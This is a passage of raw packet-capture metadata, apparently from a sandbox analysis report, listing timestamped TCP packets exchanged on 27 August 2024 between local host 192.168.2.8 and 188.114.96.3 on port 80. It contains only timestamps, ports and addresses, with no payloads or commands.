                                Aug 27, 2024 09:49:42.166536093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.166551113 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.166579008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.167340994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167351961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167363882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167387962 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.167418003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167428970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167439938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167452097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167463064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.167468071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167479038 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.167506933 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.167535067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167546034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167557001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167570114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167581081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167582035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.167593956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167603970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167609930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.167618990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.167651892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.168678045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168689966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168700933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168724060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.168735981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168749094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168759108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168771029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168781042 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.168782949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168800116 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.168824911 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.168852091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168864012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168874025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168888092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168893099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.168940067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.168946028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168962002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168967009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.168992043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.170085907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.170098066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.170104027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.170121908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.170133114 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.170133114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.170144081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.170155048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.170164108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.170166016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.170183897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.170202017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.172502041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.172547102 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.172574043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.226746082 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.243474960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.248586893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.345062971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.345628977 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.350496054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446289062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446449041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446461916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446474075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446491957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446511030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446517944 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446523905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446536064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446547985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446562052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446566105 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446574926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446579933 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446587086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446599007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446604013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446614027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446625948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446638107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446641922 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446656942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446661949 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446669102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446681976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446682930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446711063 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446814060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446825981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446835995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446851015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446854115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446871042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446877956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446883917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446894884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446907997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446918964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446922064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446930885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446943045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446947098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446959972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446964025 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446973085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446980953 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.446985960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.446996927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447016954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447020054 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447041988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447196960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447207928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447221041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447235107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447240114 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447266102 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447417021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447431087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447443008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447453976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447465897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447468996 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447479963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447491884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447493076 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447504044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447510004 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447515965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447526932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447536945 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447540998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447552919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447563887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447567940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447581053 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447607040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447802067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447813034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447829008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447839975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447850943 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447851896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447864056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447875977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447881937 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447887897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447899103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447904110 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447910070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447922945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447928905 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447937012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447941065 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447948933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447968006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447979927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.447985888 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.447992086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448004007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448007107 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448018074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448029995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448030949 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448043108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448055029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448055983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448067904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448081017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448091030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448093891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448106050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448111057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448118925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448131084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448133945 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448149920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448160887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448162079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448174000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448187113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448196888 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448199987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448210955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448221922 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448224068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448235035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448235989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448261976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448671103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448683023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448694944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448707104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448715925 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448719025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448730946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448743105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448745012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448755026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448761940 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448774099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448786020 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448786974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448798895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448810101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448817015 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448821068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448836088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448837042 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448848009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448859930 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448862076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448875904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448889971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448900938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448903084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448914051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448925972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448930979 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448936939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448945045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448949099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448961973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448962927 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448975086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448988914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.448988914 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.448999882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.449014902 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.449033976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.449680090 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.532776117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.532808065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.532819033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.532835007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.532846928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.532871962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.532883883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.532896042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.532907963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.532912970 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.532921076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.532957077 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.532959938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.532973051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.532979965 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533014059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533015013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533025980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533035994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533047915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533056974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533083916 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533160925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533175945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533186913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533199072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533211946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533221960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533235073 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533236027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533256054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533266068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533267975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533289909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533298969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533305883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533309937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533323050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533333063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533345938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533356905 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533356905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533368111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533369064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533377886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533389091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533401012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533401966 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533438921 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533550024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533567905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533581018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533591986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533600092 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533603907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533616066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533626080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533632994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533633947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533638000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533643961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533657074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533715963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533720016 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533727884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533739090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533751011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533762932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533773899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533773899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533776045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533787012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533799887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533799887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533832073 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533860922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533870935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533881903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533893108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533902884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533909082 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533922911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533937931 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533937931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533950090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533960104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533972025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533978939 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533984900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.533991098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.533998966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534033060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534059048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534070969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534080982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534111023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534121037 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534168959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534181118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534190893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534203053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534214973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534219980 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534228086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534239054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534245014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534252882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534279108 CEST4971580192.168.2.8188.114.96.3
